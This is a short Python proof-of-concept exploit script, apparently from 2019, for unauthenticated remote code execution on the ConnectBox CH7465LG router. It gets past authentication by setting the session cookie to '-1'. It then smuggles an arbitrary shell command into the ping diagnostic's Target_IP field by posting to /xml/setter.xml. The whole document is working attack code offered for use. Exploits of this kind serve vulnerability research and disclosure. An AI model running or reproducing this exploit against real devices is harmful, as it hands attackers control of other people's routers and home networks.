#!/usr/bin/env python3 """ poc-rce.py: Unauthenticated Remote Code Execution for the ConnectBox (CH7465LG). xitan - 2019 (https://xitan.me). """ import requests import sys if len(sys.argv) < 3: print("./poc-rce.py ") exit(1) session = requests.Session() index = session.get('http://' + sys.argv[1] + '/index.html', verify=False) token = index.headers.get('Set-Cookie')[ index.headers.get('Set-Cookie').find('=') + 1:index.headers.get('Set-Cookie').find(';')] session.cookies['SID'] = '-1' data = { 'token': token, 'fun': '126', 'Type': '1', 'Target_IP': 'google.com"\"; ' + sys.argv[2] + ';', 'Ping_Size': '64', 'Num_Ping': '5', 'Ping_Interval': '1' } setter = session.post('http://' + sys.argv[1] + '/xml/setter.xml', data=data, verify=False) if setter.status_code == 200: print('[+] Command successfully sent.')